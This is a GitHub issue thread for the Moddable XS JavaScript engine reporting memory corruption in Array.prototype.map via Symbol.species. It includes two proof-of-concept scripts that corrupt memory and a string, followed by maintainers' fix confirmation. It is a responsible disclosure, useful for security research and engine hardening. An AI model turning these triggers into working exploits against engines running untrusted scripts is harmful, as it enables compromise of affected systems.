Moddable-OpenSource/moddable #107: Memory Corruption in Array.prototype.map

natashenka, 2018-12-10:
The following JavaScript causes memory corruption in the XS interpreter. This is because the implementation assumes that the length of the array returned by fxCreateArraySpecies will not change throughout the map call, meanwhile, the map callback can actually change the length of this array. This is a security concern if the engine is allowed to run untrusted scripts.

var a = [1, 2, 3];

function f(){
	a.length = 10000;
	a.fill(10);
	return a;
}

var t = [];

function m(){
        a.length = 1;
        var tt = [3, 2, 1];
	tt.length = 1;
	t.push(tt);
	return 0x77777777;
}

class MyArray extends Array {
  static get [Symbol.species]() { return f; }
}

var q = [1, 2, 3];
q.length = 10000;
q.fill(7);
q.__proto__ = MyArray.prototype;
print(q.map(m));

A second sample, which causes a string to get corrupted is below:

var a = [1, 2, 3];

function f(){
	a.length = 10000;
	a.fill(10);
	return a;
}

var t = [];

function m(){

        a.length = 1;
	var tt = "0123456789012345678901234567890123456789"
	t.push(tt);
	return 0x77777777;
}

class MyArray extends Array {
  static get [Symbol.species]() { return f; }
}

var q = [1, 2, 3];
q.length = 1000;
q.fill(7);

q.__proto__ = MyArray.prototype;

print(q.map(m));
for(var i = 0; i < 10; i++)
	if(t[i] !="0123456789012345678901234567890123456789"){
		print(t[i]);
	}
}

patrick-soquet, 2019-01-05:
Sorry for the delay and thank you much for the report. I committed a fix which should be published next week. Meanwhile xst 8.6.2 is available so you can test with `eshost`.

phoddie, 2019-01-29:
Fix is committed.

closed 2019-01-29 by phoddie

natashenka, 2019-02-10:
The fix looks good, thanks!